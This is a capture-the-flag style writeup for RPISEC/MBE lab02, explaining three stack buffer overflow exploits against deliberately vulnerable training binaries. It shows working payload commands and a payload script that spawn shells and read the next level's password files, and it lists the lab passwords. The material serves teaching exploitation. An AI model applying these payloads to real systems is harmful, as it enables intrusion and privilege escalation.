RPISEC/MBE: writeup lab02 (Memory Corruption)

In the last writeup for RPISEC/MBE lab01 we used radare2 to reverse three different binaries in order to reveal a secret password or serial. In this writeup we continue with lab02 which broaches the issue of Memory Corruption.

As well as in the last lab there are three levels ranging from C to A:
–> lab2C
–> lab2B
–> lab2A


lab2C

We start by connecting to the first level of lab02 using the credentials lab2C with the password lab02start:

gameadmin@warzone:~$ sudo ssh lab2C@localhost
lab2C@localhost's password: (lab02start)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 10:51:22 2018 from localhost

In contrast to the last lab, where we were only faced with the binary, in this lab we have access the source code. The source code is also located in the levels directory /levels/lab02/:

lab2C@warzone:~$ cd /levels/lab02
lab2C@warzone:/levels/lab02$ ls -al
total 44
drwxr-xr-x  2 root    root  4096 Jun 21  2015 .
drwxr-xr-x 14 root    root  4096 Sep 28  2015 ..
-r-sr-x---  1 lab2end lab2A 7500 Jun 21  2015 lab2A
-r--------  1 lab2A   lab2A 1153 Jun 21  2015 lab2A.c
-r-sr-x---  1 lab2A   lab2B 7451 Jun 21  2015 lab2B
-r--------  1 lab2B   lab2B  474 Jun 21  2015 lab2B.c
-r-sr-x---  1 lab2B   lab2C 7428 Jun 21  2015 lab2C
-r--------  1 lab2C   lab2C  513 Jun 21  2015 lab2C.c

Let’s have a look:

lab2C@warzone:/levels/lab02$ cat lab2C.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2C.c -o lab2C
 */

void shell()
{
	printf("You did it.\n");
	system("/bin/sh");
}

int main(int argc, char** argv)
{
	if(argc != 2)
	{
		printf("usage:\n%s string\n", argv[0]);
		return EXIT_FAILURE;
	}

	int set_me = 0;
	char buf[15];
	strcpy(buf, argv[1]);

	if(set_me == 0xdeadbeef)
	{
		shell();
	}
	else
	{
		printf("Not authenticated.\nset_me was %d\n", set_me);
	}

	return EXIT_SUCCESS;
}

The first thing we need to do is to spot the vulnerability within the source code. In this case there is a call to the function strcpy on line 26. As the man page advises this function is prone to buffer overflows:

lab2C@warzone:/levels/lab02$ man strcpy
STRCPY(3)                                                               Linux Programmer's Manual                                                              STRCPY(3)

NAME
       strcpy, strncpy - copy a string

SYNOPSIS
       #include <string.h>

       char *strcpy(char *dest, const char *src);

       char *strncpy(char *dest, const char *src, size_t n);

DESCRIPTION
       The  strcpy()  function  copies  the string pointed to by src, including the terminating null byte ('\0'), to the buffer pointed to by dest.  The strings may not
       overlap, and the destination string dest must be large enough to receive the copy.  Beware of buffer overruns!  (See BUGS.)
...

As stated in the man page the destination string must be large enough to receive the copy. Because the destination string buf is only 15 bytes long and the source string is the first parameter to the program (argv[1]) we can simply input a larger string leading to a buffer overflow.

On line 28 set_me is compared to the value 0xdeadbeef. If the comparison succeeds the function shell is called kindly spawning a shell for us. Thus we need to use the buffer overflow vulnerability to overwrite the variable set_me with the value 0xdeadbeef.

As with all local variables set_me and buf are placed on the stack. In the c source code set_me is declared first. That means that it is pushed on the stack before buf. Because the stack grows from bottom to the top set_me is located at a higher address than buf:

X +  0:  [    buf   ]  <-- declared second
X + 15:  [  set_me  ]  <-- declared first

Let’s have a quick view on the assembly to verify this assumption:

...
[0x080485b0]> pdf @ sym.main
╒ (fcn) sym.main 119
│          ; arg int arg_0_2      @ ebp+0x2
│          ; arg int arg_3        @ ebp+0xc
│          ; DATA XREF from 0x080485c7 (entry0)
│          ;-- main:
│          ;-- sym.main:
│          0x080486cd    55             push ebp
│          0x080486ce    89e5           mov ebp, esp
│          0x080486d0    83e4f0         and esp, 0xfffffff0
│          0x080486d3    83ec30         sub esp, 0x30
│          0x080486d6    837d0802       cmp dword [ebp + 8], 2          ; [0x2:4]=0x101464c
│      ┌─< 0x080486da    741c           je 0x80486f8
│      │   0x080486dc    8b450c         mov eax, dword [ebp + 0xc]      ; [0xc:4]=0
│      │   0x080486df    8b00           mov eax, dword [eax]
│      │   0x080486e1    89442404       mov dword [esp + 4], eax        ; [0x4:4]=0x10101
│      │   0x080486e5    c70424f48704.  mov dword [esp], str.usage:_n_s_string_n  ; [0x80487f4:4]=0x67617375  ; "usage:.%s string." @ 0x80487f4
│      │   0x080486ec    e85ffeffff     call sym.imp.printf             ; sub.printf_12_54c+0x4
│      │     ^- sub.printf_12_54c() ; sym.imp.printf
│      │   0x080486f1    b801000000     mov eax, 1
│     ┌──< 0x080486f6    eb4a           jmp 0x8048742
│     │└   ; JMP XREF from 0x080486da (sym.main)
│     │└─> 0x080486f8    c744242c0000.  mov dword [esp + 0x2c], 0       ; [0x2c:4]=0x280009  ; ','
│     │    0x08048700    8b450c         mov eax, dword [ebp + 0xc]      ; [0xc:4]=0
│     │    0x08048703    83c004         add eax, 4
│     │    0x08048706    8b00           mov eax, dword [eax]
│     │    0x08048708    89442404       mov dword [esp + 4], eax        ; [0x4:4]=0x10101
│     │    0x0804870c    8d44241d       lea eax, [esp + 0x1d]           ; 0x1d
│     │    0x08048710    890424         mov dword [esp], eax
│     │    0x08048713    e848feffff     call sym.imp.strcpy
...

On line 23 the local variable set_me stored in esp+0x2c is initalized with 0. Before the call to strcpy the address of second local variable buf stored in esp+0x1d is moved on the stack on line 28. Between both location there are exactly the 0x2c - 0x1d = 44 - 29 = 15 bytes of buf. As predicted set_me is located after buf meaning that we can overwrite set_me if we overflow buf.

Thus the only thing we need to do is call the program with the appropriate argument. This arguments must consist of 15 arbitrary bytes plus the 4 bytes we want to write into set_me:

argument =  XXXXXXXXXXXXXXXYYYY
                 buf      set_me
              (15 byte)  (4 byte)

As we want to set set_me to the value 0xdeadbeef we have to consider that integers are stored in little endian format. In little endian the bytes are stored in reverse order:

integer =   0xdeadbeef
memory  :   ef be ad de

On the commandline we can use python to create to appropriate string:

lab2C@warzone:/levels/lab02$ ./lab2C $(python -c 'print("A"*15+"\xef\xbe\xad\xde")')
You did it.
$ whoami
lab2B
$ cat /home/lab2B/.pass
1m_all_ab0ut_d4t_b33f

Done 🙂 The password for the next level is 1m_all_ab0ut_d4t_b33f.


lab2B

The credentials for the next level are lab2B with the password 1m_all_ab0ut_d4t_b33f:

gameadmin@warzone:~$ sudo ssh lab2B@localhost
lab2B@localhost's password: (1m_all_ab0ut_d4t_b33f)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 16:04:01 2018 from localhost

Again we have access to the source code:

lab2B@warzone:/levels/lab02$ cat lab2B.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2B.c -o lab2B
 */

char* exec_string = "/bin/sh";

void shell(char* cmd)
{
	system(cmd);
}

void print_name(char* input)
{
	char buf[15];
	strcpy(buf, input);
	printf("Hello %s\n", buf);
}

int main(int argc, char** argv)
{
	if(argc != 2)
	{
		printf("usage:\n%s string\n", argv[0]);
		return EXIT_FAILURE;
	}

	print_name(argv[1]);

	return EXIT_SUCCESS;
}

Like in the previous level there is a call to the function strcpy (line 20). As we have already seen in the last level, we can use this function to raise a buffer overflow, because the argument passed to the program (argv[1]) is passed to the function print_name which is then passed to strcpy as the source string.

There is also a user-defined function called shell (lines 12-15), but it differs from the last one. This shell function does not directly spawn a shell, but rather take one string argument, which is then passed to the function system. If we have a look at the rest of the source code we notice that the function is actually never called. Thus we have to trigger it ourselves.

Above the shell function declaration on line 10 we can see that the author of the source code kindly declared a variable which contains the string we would like to pass the to shell function: "/bin/sh".

Summing it up we have to:
–> push the address of "/bin/sh" on the stack
–> call the user-defined function shell

In order to do this, the first thing we need to know is the address of the string "/bin/sh" as well as the address of the function shell. We can use r2 to do this:

[0x080485c0]> iz~bin
vaddr=0x080487d0 paddr=0x000007d0 ordinal=000 sz=8 len=7 section=.rodata type=a string=/bin/sh
[0x080485c0]> is~shell
vaddr=0x080486bd paddr=0x000006bd ord=070 fwd=NONE sz=19 bind=GLOBAL type=FUNC name=shell

The string "/bin/sh" is at 0x080487d0 and the function shell is at 0x080486bd.

Good for now. But how to we call the function shell? If we have look at the source code again, we can see that strcpy is called within the user-defined function print_name. Let’s have a look at the assembly which calls the function print_name is called:

[0x080485c0]> pdf @ sym.main
...
│     │    0x08048730    890424         mov dword [esp], eax
│     │    0x08048733    e898ffffff     call sym.print_name
...

eax contains the address of the string-argument passed to the program (argv[1]). This address is moved on the stack and then the call instructions is used to execute the print_name function. After the function is executed, the processor needs to know where to proceed the execution. Thus the address of the next instruction after the call has to be saved. This is what the call instruction does: it pushes the address of the next instruction on the stack and then jumps to the function’s address. When the function is entered, the stack looks like this:

esp+0x00:  [ return address ]  <-- return address pushed by call esp+0x04: [ argument ] <-- argument passed to function print_name

At the end of the function…

[0x080485c0]> pdf @ sym.print_name
...
╘          0x080486fc    c3             ret

… there is a ret instruction, which simply pops the top element of the stack (the return address formerly pushed by the call instruction) and then jumps to that address. This way the execution can proceed at the location right after the call.

As we have already seen in the last lab, we can use the buffer overflow vulnerability caused by the call to strcpy in order to overwrite elements on the stack. The buffer we can overflow (buf) is a local variable which is stored on the stack. Because this local variable is pushed on the stack after the return address is pushed, it is located before the return address in memory (at a lower address). That is why we can overwrite the return address.

Now we just need to know where the return address and the buffer are located on the stack in order to calculate how much bytes we need to write. A quite dull but effective way is to input a pattern long enough to overwrite the return address, let the program crash and then see which part of the pattern caused the crash. This can be done using gdb:

lab2B@warzone:/levels/lab02$ gdb lab2B
Reading symbols from lab2B...(no debugging symbols found)...done.
gdb-peda$ r AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Starting program: /levels/lab02/lab2B AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
Hello AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x2f ('/')
EBX: 0xb7fcd000 --> 0x1a9da8 
ECX: 0x0 
EDX: 0xb7fce898 --> 0x0 
ESI: 0x0 
EDI: 0x0 
EBP: 0x47474746 ('FGGG')
ESP: 0xbffff6c0 ("HIIIIJJJJ")
EIP: 0x48484847 ('GHHH')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x48484847
[------------------------------------stack-------------------------------------]
0000| 0xbffff6c0 ("HIIIIJJJJ")
0004| 0xbffff6c4 ("IJJJJ")
0008| 0xbffff6c8 --> 0x804004a 
0012| 0xbffff6cc --> 0xb7fcd000 --> 0x1a9da8 
0016| 0xbffff6d0 --> 0x8048740 (<__libc_csu_init>:	push   ebp)
0020| 0xbffff6d4 --> 0x0 
0024| 0xbffff6d8 --> 0x0 
0028| 0xbffff6dc --> 0xb7e3ca83 (<__libc_start_main+243>:	mov    DWORD PTR [esp],eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV

On line 2 you can see that I provided the pattern AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ as argument to the program. On line 4 the program properly outputs the greeting-message right before receiving a SIGSEGV signal (Segmentation fault). A segmentation fault is raised when the program tries to access memory which is not accessible. On line 19 we can see that this was caused by the instruction pointer (eip) trying to access the address 0x48484847. As you may have noticed, this is a part of our pattern because 0x48484847 equals GHHH. Now we can calculate the offset:

pattern =  AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
                     27 byte          eip

Thus if we input the following string, we overwrite the return address and the code execution proceeds in the function shell:

python -c 'print("A"*27+"\xbd\x86\x04\x08")

Side note: patterns and the offset within the pattern can be easily create / calculated using the metasploit script pattern_create and pattern_offset.

There is still one thing missing. We need to provide the "/bin/sh" string to the shell function. But where to put it? Right after the address of the shell function? As the ret instruction at the end of the print_name function just pops our modified return address from the stack and directly jumps to that address, no ordinary call instruction is executed. As we have already seen the stack should look like this at the entry of a function:

esp+0x00:  [ return address ]  <-- return address pushed by call esp+0x04: [ argument ] <-- argument passed to function shell

This is not the return address from the print_name call but the return address from the shell function we are returning to. Because there is no call we need to put this return address on the stack ourselves. As we do not really care where the execution proceeds after we got a shell, we can just put junk in here. A more elegant way would be to call exit in order to gracefully shutdown the program.

Summing this all up the string argument we need to pass the program looks like this:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
XXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAXXXXBBBB

AAAA = address of function shell BBBB = address of string "/bin/sh"

Now we can pass the final string to the program:

lab2B@warzone:/levels/lab02$ ./lab2B $(python -c 'print("X"*27 + "\xbd\x86\x04\x08" + "XXXX" + "\xd0\x87\x04\x08")')
Hello XXXXXXXXXXXXXXXXXXXXXXXXXXX...
$ whoami
lab2A
$ cat /home/lab2A/.pass
i_c4ll_wh4t_i_w4nt_n00b

Done 🙂 The password for the next level is i_c4ll_wh4t_i_w4nt_n00b.


lab2A

The credentials for the last level of this lab are lab2A with the password i_c4ll_wh4t_i_w4nt_n00b:

gameadmin@warzone:~$ sudo ssh lab2A@localhost
lab2A@localhost's password: (i_c4ll_wh4t_i_w4nt_n00b)
        ____________________.___  _____________________________                
        \______   \______   \   |/   _____/\_   _____/\_   ___ \               
         |       _/|     ___/   |\_____  \  |    __)_ /    \  \/               
         |    |   \|    |   |   |/        \ |        \\     \____              
         |____|_  /|____|   |___/_______  //_______  / \______  /              
                \/                      \/         \/         \/               
 __      __  _____ ____________________________    _______  ___________
/  \    /  \/  _  \\______   \____    /\_____  \   \      \ \_   _____/
\   \/\/   /  /_\  \|       _/ /     /  /   |   \  /   |   \ |    __)_ 
 \        /    |    \    |   \/     /_ /    |    \/    |    \|        \
  \__/\  /\____|__  /____|_  /_______ \\_______  /\____|__  /_______  /
       \/         \/       \/        \/        \/         \/        \/ 

        --------------------------------------------------------        

                       Challenges are in /levels                        
                   Passwords are in /home/lab*/.pass                    
            You can create files or work directories in /tmp            
                    
         -----------------[ contact@rpis.ec ]-----------------          

Last login: Fri Jan 19 16:10:00 2018 from localhost

We start by analyzing the provided source code:

lab2A@warzone:/levels/lab02$ cat lab2A.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * compiled with:
 * gcc -O0 -fno-stack-protector lab2A.c -o lab2A
 */

void shell()
{
        printf("You got it\n");
        system("/bin/sh");
}

void concatenate_first_chars()
{
        struct {
                char word_buf[12];
                int i;
                char* cat_pointer;
                char cat_buf[10];
        } locals;
        locals.cat_pointer = locals.cat_buf;

        printf("Input 10 words:\n");
        for(locals.i=0; locals.i!=10; locals.i++)
        {
                // Read from stdin
                if(fgets(locals.word_buf, 0x10, stdin) == 0 || locals.word_buf[0] == '\n')
                {
                        printf("Failed to read word\n");
                        return;
                }
                // Copy first char from word to next location in concatenated buffer
                *locals.cat_pointer = *locals.word_buf;
                locals.cat_pointer++;
        }

        // Even if something goes wrong, there's a null byte here
        //   preventing buffer overflows
        locals.cat_buf[10] = '\0';
        printf("Here are the first characters from the 10 words concatenated:\n\
%s\n", locals.cat_buf);
}

int main(int argc, char** argv)
{
        if(argc != 1)
        {
                printf("usage:\n%s\n", argv[0]);
                return EXIT_FAILURE;
        }

        concatenate_first_chars();

        printf("Not authenticated\n");
        return EXIT_SUCCESS;
}

What does the program do?
–> the main-function simply calls the function concatenate_first_chars (line 55)
–> in concatenate_first_chars a struct named locals is defined (line 18-23)
–> a prompt to input 10 words is displayed (line 26)
–> a for-loop initalizes locals.i with 0 and keeps looping as long as locals.i does not equal 10 (line 27)
–> locals.i is incremented by one every loop-step (line 27)
–> within the loop-body fgets reads a maximum of 0x10 = 16 bytes into locals.word_buf from stdin (line 30)
–> the first read character from locals.word_buf is copied to locals.cat_buf by using the pointer locals.cat_pointer (line 36)
–> locals.cat_pointer is incremented by 1 in order to point to the next character within locals.cat_buf on the next loop-iteration (line 37)
–> after the loop the 11th entry of locals.cat_buf is set to 0 (which is actually a overflow because locals.cat_buf is only 10 bytes long) (line 42)
–> the concatenated string locals.cat_buf is printed (line 43-44)

Like in the first level there is a function named shell, which does not take any arguments and spawns a shell (lines 10-14). Thus our goal is to call this function. As we have already seen in the second level of this lab, this can be achieved by overwriting the return address within a function call if there is a vulnerability we can exploit.

As you may have noticed, on line 30 fgets reads 16 bytes into locals.word_buf. If we have a look at the struct declaration on line 19 we can see that locals.word_buf is only 12 bytes long. Thus we can overflow locals.word_buf by 4 bytes. These 4 bytes would be written into the variable following locals.word_buf, which is locals.i: the loop-index! This way we can control how much iterations the loop does.

Within the loop-body locals.cat_pointer is incremented on each iteration without any further checking. If the loop iterates more than 10 times, the memory following locals.cut_buf is overwritten. As we have seen in the second level of this lab, this memory contains the return address, which has been pushed by the last call instruction (in this case call concatenate_first_chars).

Summing it up we have to:

  1. determine the input to overwrite locals.i so that the loop iterates enough times to make locals.cat_pointer point to the return address
  2. get the address of the function we want to call (shell)
  3. determine the location of the return address on the stack
  4. construct the final input to the program

1. overwrite loop-index locals.i

Because we want to overwrite the stack by using the locals.cat_pointer which is incremented within the loop-body, we need to manipulate the loop-index in order to make more than 10 iterations. As the loop-index i is located directly after the buffer which we can overflow (word_buf), it suffices to input 12 arbitrary characters. Because the input is read using fgets the newline (0xa) entered to end the input is also put into the destination string. Thus the memory looks like this if we write 12 characters:

[--------------word_buf-----------] [----i----]
X  X  X  X  X  X  X  X  X  X  X  X  \n
58 58 58 58 58 58 58 58 58 58 58 58 0a 00 00 00

As the integer value of i is stored in little endian and thus the first byte is the least significant byte the value of i is just 0xa = 10. This value is incremented by one and then compared to 10. This way the loop keeps iterating (i = 11, 12, 13, …). In order to exit the loop we can enter an empty line. If locals.word_buf[0] is equal to '\n' the function returns (line 30).

2. address of function shell

This is quite easy as we already did it in the last levels using radare2:

lab2A@warzone:/levels/lab02$ r2 lab2A
 -- In Soviet Russia, radare2 have documentation.
[0x08048600]> aaa
[0x08048600]> is~shell
vaddr=0x080486fd paddr=0x000006fd ord=071 fwd=NONE sz=32 bind=GLOBAL type=FUNC name=shell

The function shell is located at 0x080486fd.

3. location of return address

This is a little bit more complicated. We could modify the loop-index, overwrite the stack with a pattern and then see which part of the pattern causes a segmentation fault like we did in the second level. This time we want to calculate the offset statically for learning purpose. All we need is to have a look at the concatenate_first_chars function using r2:

[0x08048600]> pdf @ sym.concatenate_first_chars 
╒ (fcn) sym.concatenate_first_chars 153
│          ; var int local_2_2    @ ebp-0xa
│          ; var int local_6      @ ebp-0x18
│          ; var int local_7      @ ebp-0x1c
│          ; var int local_10     @ ebp-0x28
│          ; CALL XREF from 0x080487e1 (sym.main)
│          ;-- sym.concatenate_first_chars:
│          0x0804871d    55             push ebp
│          0x0804871e    89e5           mov ebp, esp
│          0x08048720    83ec38         sub esp, 0x38
│          0x08048723    8d45d8         lea eax, [ebp-local_10]
│          0x08048726    83c014         add eax, 0x14
│          0x08048729    8945e8         mov dword [ebp-local_6], eax
│          0x0804872c    c70424a38804.  mov dword [esp], str.Input_10_words:  ; [0x80488a3:4]=0x75706e49  ; "Input 10 words:" @ 0x80488a3
│          0x08048733    e888feffff     call sym.imp.puts
...

How does the stack look like? When the function is called the call instruction stores the return address we want to override on the top of stack:

esp     :  [   return address   ]  <-- pushed by call instruction

In the function prologue ebp is pushed on the stack (line 9):

esp     :  [      saved ebp     ]  <-- pushed in function prologue
esp+0x04:  [   return address   ]  <-- pushed by call instruction

On line 10 ebp is set to the value of esp since local variables are referenced with ebp:

ebp     :  [      saved ebp     ]  <-- pushed in function prologue
ebp+0x04:  [   return address   ]  <-- pushed by call instruction

To calculate the offset to the return address we need to know where the struct is located on the stack. On line 12 we can see that eax is loaded with the address ebp-local_10 (this is ebp-0x28 as you can see at the top of the r2 output on line 6). On line 13 0x14 is added to this address. The result is stored at ebp-local_6 (ebp-0x18). This equals line 24 of the original source code where locals.cat_pointer is set to the address of locals.cat_buf. Thus we have already two offsets of the struct. locals.cat_pointer is located at ebp-0x18 and locals.cat_buf is located at ebp-0x28 + 0x14 = ebp-0x14. Now we can add the other struct-members and outline the stack:

ebp-0x28:  [   locals.word_buf  ]
ebp-0x1c:  [       locals.i     ]
ebp-0x18:  [ locals.cat_pointer ]
ebp-0x14:  [   locals.cat_buf   ]
ebp-0x0a:            ...
ebp     :  [      saved ebp     ]  <-- pushed in function prologue
ebp+0x04:  [   return address   ]  <-- pushed by call instruction

In order to overwrite the return address we have to write 10 + 10 + 4 = 24 bytes to locals.cat_buf. The first 10 bytes fill the array locals.cat_buf. The next 10 bytes fill the space between ebp-0x0a and ebp. The last 4 bytes overwrite the saved ebp. After that the next 4 bytes we write will overwrite the return address.

4. final input

Now we have all information we need to construct the final input to the program in order to get our shell. I wrote a little python script to create the input, which we can later redirect to the program:

# overwrite locals.i
print("X"*12)

# fill locals.cat_buf and gap to ebp+0x04
for i in range(23):
  print("X")

# overwrite return address
print("\xfd")
print("\x86")
print("\x04")
print("\x08")

# input empty line to exit loop
print("")

On line 2 locals.i is overwritten with the ending newline (0xa) which makes the loop read more than the originally intended 10 words. Notice that this only puts one byte into locals.cat_buf because only the first char is moved there. The next 23 bytes are filled with an X (lines 5-6). At last the return address is overwritten with the address of the function shell.

Now we can store the python output in a file…

lab2A@warzone:/levels/lab02$ python /tmp/lab2A.py > /tmp/out

… and pipe that input to the program. One thing to notice here is that we cannot just simply do this:

lab2A@warzone:/levels/lab02$ cat /tmp/out| ./lab2A
Input 10 words:
Failed to read word
You got it
Segmentation fault
lab2A@warzone:/levels/lab02$

A segmentation fault is raised and the program is quit. The message You got it is printed meaning that the function shell has been called successfully and we should have get a shell. Because we only piped the output of cat to the program we cannot interact with the shell. This can be done by simply adding another cat command rebinding the stdin to our input:

lab2A@warzone:/levels/lab02$ python /tmp/hax.py > /tmp/out
lab2A@warzone:/levels/lab02$ (cat /tmp/out; cat) | ./lab2A
Input 10 words:
Failed to read word
You got it

Now we can interact with the shell as usual:

whoami
lab2end
cat /home/lab2end/.pass
D1d_y0u_enj0y_y0ur_cats?

Done 🙂 The final password is D1d_y0u_enj0y_y0ur_cats.